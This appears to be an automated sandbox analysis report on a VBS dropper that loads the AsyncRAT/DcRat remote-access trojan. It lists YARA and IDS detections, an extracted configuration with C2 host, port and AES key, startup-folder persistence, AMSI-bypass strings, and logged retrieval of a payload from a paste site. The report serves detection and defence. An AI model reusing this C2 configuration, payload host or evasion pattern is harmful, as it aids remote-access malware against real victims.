11.2.powershell.exe.1d38e3da290.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x9cda:$q1: Select * from Win32_CacheMemory 0x15b82:$q1: Select * from Win32_CacheMemory 0x13f012:$q1: Select * from Win32_CacheMemory 0x3ae2ca:$q1: Select * from Win32_CacheMemory 0x9d1a:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x15bc2:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x13f052:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x3ae30a:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x9d68:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x15c10:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x13f0a0:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x3ae358:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x9db6:$d3: {55272A00-42CB-11CE-8135-00AA004BB851} 0x15c5e:$d3: {55272A00-42CB-11CE-8135-00AA004BB851} 0x13f0ee:$d3: {55272A00-42CB-11CE-8135-00AA004BB851} 0x3ae3a6:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
11.2.powershell.exe.1d38e3da290.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DcRatBy	Detects executables containing the string DcRatBy	ditekSHen	0xa152:$s1: DcRatBy 0x15ffa:$s1: DcRatBy 0x13f48a:$s1: DcRatBy 0x3ae742:$s1: DcRatBy
6.2.powershell.exe.2464fbd9680.3.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
6.2.powershell.exe.2464fbd9680.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
6.2.powershell.exe.2464fbd9680.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x9a58:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x15a38:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x99a3:$s2: L2Mgc2NodGFza3MgL2 0x15983:$s2: L2Mgc2NodGFza3MgL2 0x9922:$s3: QW1zaVNjYW5CdWZmZXI 0x15902:$s3: QW1zaVNjYW5CdWZmZXI 0x9970:$s4: VmlydHVhbFByb3RlY3Q 0x15950:$s4: VmlydHVhbFByb3RlY3Q
6.2.powershell.exe.2464fbd9680.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x9cda:$q1: Select * from Win32_CacheMemory 0x15cba:$q1: Select * from Win32_CacheMemory 0x9d1a:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x15cfa:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x9d68:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x15d48:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x9db6:$d3: {55272A00-42CB-11CE-8135-00AA004BB851} 0x15d96:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
6.2.powershell.exe.2464fbd9680.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DcRatBy	Detects executables containing the string DcRatBy	ditekSHen	0xa152:$s1: DcRatBy 0x16132:$s1: DcRatBy
Click to see the 145 entries

Sigma Signatures

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 924, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemLogin.vbs

Snort Signatures

ETPRO TROJAN Observed Malicious SSL Cert (AsyncRAT Variant) - Source IP: 91.193.75.216 - Destination IP: 192.168.2.6

Timestamp:	91.193.75.216192.168.2.69217497592848152 05/16/22-19:30:11.449233
SID:	2848152
Source Port:	9217
Destination Port:	49759
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Malicious SSL Cert (AsyncRAT) - Source IP: 91.193.75.216 - Destination IP: 192.168.2.6

Timestamp:	91.193.75.216192.168.2.69217497592034847 05/16/22-19:30:11.449233
SID:	2034847
Source Port:	9217
Destination Port:	49759
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0000000B.00000002.535314776.000001D38E80B000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: AsyncRAT {"Server": "sky01.publicvm.com", "Ports": "9217", "Version": " 1.0.7", "Autorun": "false", "Install_Folder": "%AppData%", "Install_File": "", "AES_key": "5RESCY68ciiacdgkayNo6rGfK4TKsWv4", "Mutex": "DcRatMutex_qwqdanchun", "AntiDetection": "null", "External_config_on_Pastebin": "false", "BDOS": "1", "Startup_Delay": "Sb7k9N6y/mjln0+cqCNQvo00pCerPyhdvCCZIzPJia3lj82KZYQeECX3k++HZ8gO4e8gjBjgr2+5d1mjRmJUQQ==", "HWID": "null", "Certificate": "MIICMDCCAZmgAwIBAgIVANDdhyIzFkRkVUdU1pUsWShwjeXTMA0GCSqGSIb3DQEBDQUAMGQxFTATBgNVBAMMDERjUmF0IFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEcMBoGA1UECgwTRGNSYXQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIwMTEyNzIxMjU0NVoXDTMxMDkwNjIxMjU0NVowEDEOMAwGA1UEAwwFRGNSYXQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJAPN6hAAYtlFpprsg+awNYGXe+gvrIVoVQz2ubNjglQKceBMbhrB9fJZfXJkDLol6/a3Jd4JycS51W+zZgLbcjK8rwRyJ+AUI9TJN4ghCPvSgqXiqTzwruPo+z8B41xcddSJ8Iv49ReFpZGNfbzC4AL5U3gWj+Gq+o4Eh1TigrrAgMBAAGjMjAwMB0GA1UdDgQWBBSieJAE4Zd65wRgTOwM9yD2xjDKZjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4GBAH+wbEwYgTSF3NRuSaLbjALT8E5lmhrkkc7l8R7dojnqZqGA6GqIR3B1aERDKeX6YY3msdmw4uK4K7qWXuWRhjn1Zbweea4YrUyTLtTu1OYJpE9z7vVTfXi7Pkl+j9187kZ8f+S+EvFo9aw2YO5jK9UTyZ8dhtQuhpC9sRSCwQ5f", "ServerSignature": "WoklUUd+SGm6e+hGmYIVMdTguE/XnNLwPxGmIOoxt2UjxnKg6OsTdNTB9cmWQ+jVcpyD/M40s29l+GdlklpBRG3mflrHprg7R+Q9GKMdUToU8MO6imLwgYm5Ft0mzcc8W5sb5cqZ4Bg8wPJ907IBJ3Gd0vUUtxJgxLqCP7AFfis=", "Group": "false"}

Multi AV Scanner detection for submitted file

Source: Re-RFQ - PN List.vbs

ReversingLabs: Detection: 12%

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.dll	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\Public\gia9ab2dg0.PS1	Avira: detection malicious, Label: DR/PShell.G2
Source: C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.dll	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemLogin.vbs	Avira: detection malicious, Label: VBS/PSRunner.VPAY

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.dll	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.dll	Joe Sandbox ML: detected

Source: unknown

HTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.6:49736 version: TLS 1.0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

Source:	Binary string: :C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.pdbXP source: powershell.exe, 00000006.00000002.503794683.000002464FA26000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: :C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.pdb@ source: powershell.exe, 00000006.00000002.501027753.000002464F879000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File opened: c:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File opened: c:\Users\user\AppData\Roaming\Microsoft\Windows\
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File opened: c:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File opened: c:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File opened: c:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File opened: c:\Users\user\AppData\Roaming\

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe	Network Connect: 199.102.48.248 1433
Source: C:\Windows\System32\wscript.exe	Domain query: SQL8003.site4now.net

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2034847 ET TROJAN Observed Malicious SSL Cert (AsyncRAT) 91.193.75.216:9217 -> 192.168.2.6:49759
Source: Traffic	Snort IDS: 2848152 ETPRO TROJAN Observed Malicious SSL Cert (AsyncRAT Variant) 91.193.75.216:9217 -> 192.168.2.6:49759

Yara detected Generic Downloader

Source: Yara match	File source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8932f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8b7a20.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbc0f38.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464f298700.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8aba40.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e3e6138.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e50f5c8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbe5660.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e3da290.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbd9680.3.raw.unpack, type: UNPACKEDPE

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: sky01.publicvm.com

Source: Joe Sandbox View

ASN Name: AS-30083-GO-DADDY-COM-LLCUS AS-30083-GO-DADDY-COM-LLCUS

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: global traffic

HTTP traffic detected: GET /raw/gia9ab2dg0 HTTP/1.1Host: textbin.netConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 148.72.177.212 148.72.177.212
Source: Joe Sandbox View	IP Address: 199.102.48.248 199.102.48.248

Source: unknown

HTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.6:49736 version: TLS 1.0

Source: global traffic	TCP traffic: 192.168.2.6:49732 -> 199.102.48.248:1433
Source: global traffic	TCP traffic: 192.168.2.6:49759 -> 91.193.75.216:9217

Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736

Source: wscript.exe, 00000000.00000002.406545482.000001C9E1FDF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.401534495.000001C9E1FCA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.535727725.000001B3CCE70000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.510131517.0000024666F8E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.538521959.000001D3A68A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wscript.exe, 00000000.00000002.406545482.000001C9E1FDF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.401534495.000001C9E1FCA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: wscript.exe, 00000000.00000002.406545482.000001C9E1FDF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.401534495.000001C9E1FCA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000002.406545482.000001C9E1FDF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.401534495.000001C9E1FCA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab5%
Source: wscript.exe, 00000000.00000003.389995366.000001C9E3EEF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?6699eb21577f6
Source: powershell.exe, 00000002.00000002.535236565.000001B3C4AA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.509443162.000002465EC34000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.492233928.000002464EE2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.522337987.000001B3B4A41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.491464852.000002464EBD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.530065189.000001D38DE21000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.910606131.0000000003351000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.492233928.000002464EE2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000006.00000002.509443162.000002465EC34000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.509443162.000002465EC34000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.509443162.000002465EC34000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000006.00000002.492233928.000002464EE2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.534601743.000001B3B5C2B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.535236565.000001B3C4AA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.509443162.000002465EC34000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.523386624.000001B3B4C52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://textbin.net
Source: powershell.exe, 00000002.00000002.527898174.000001B3B54C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://textbin.net/raw/gia9ab2dg0
Source: powershell.exe, 00000002.00000002.523386624.000001B3B4C52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://textbin.net/raw/gia9ab2dg00y

Source: unknown

DNS traffic detected: queries for: SQL8003.site4now.net

Source: global traffic

HTTP traffic detected: GET /raw/gia9ab2dg0 HTTP/1.1Host: textbin.netConnection: Keep-Alive

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected AsyncRAT

Source: Yara match	File source: 11.2.powershell.exe.1d38e3da290.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8b7a20.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8932f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8932f8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbd9680.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8aba40.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbc0f38.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e3e6138.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbe5660.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464f298700.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8b7a20.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbc0f38.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e50f5c8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464f298700.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8aba40.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e3e6138.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e50f5c8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbe5660.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e3da290.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbd9680.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000000.482202249.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.522369238.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.521087043.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.909303813.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.482568834.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.521388482.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.508035247.000002464FAFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.482880549.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.508351680.000002464FBD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.483188159.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.535314776.000001D38E80B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.532336594.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.532881754.000001D38E3D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.522066240.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.535498230.000001D38E8A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.492233928.000002464EE2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 924, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7116, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 6428, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 11.2.powershell.exe.1d38e3da290.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 11.2.powershell.exe.1d38e3da290.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 11.2.powershell.exe.1d38e3da290.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8b7a20.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8b7a20.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8b7a20.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8932f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8932f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8932f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8932f8.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8932f8.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8932f8.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 6.2.powershell.exe.2464fbd9680.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 6.2.powershell.exe.2464fbd9680.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 6.2.powershell.exe.2464fbd9680.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8aba40.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8aba40.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8aba40.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 6.2.powershell.exe.2464fbc0f38.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 6.2.powershell.exe.2464fbc0f38.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 6.2.powershell.exe.2464fbc0f38.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 11.2.powershell.exe.1d38e3e6138.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 11.2.powershell.exe.1d38e3e6138.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 11.2.powershell.exe.1d38e3e6138.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 14.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 14.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 14.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 6.2.powershell.exe.2464fbe5660.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 6.2.powershell.exe.2464fbe5660.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 6.2.powershell.exe.2464fbe5660.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 6.2.powershell.exe.2464f298700.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 6.2.powershell.exe.2464f298700.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
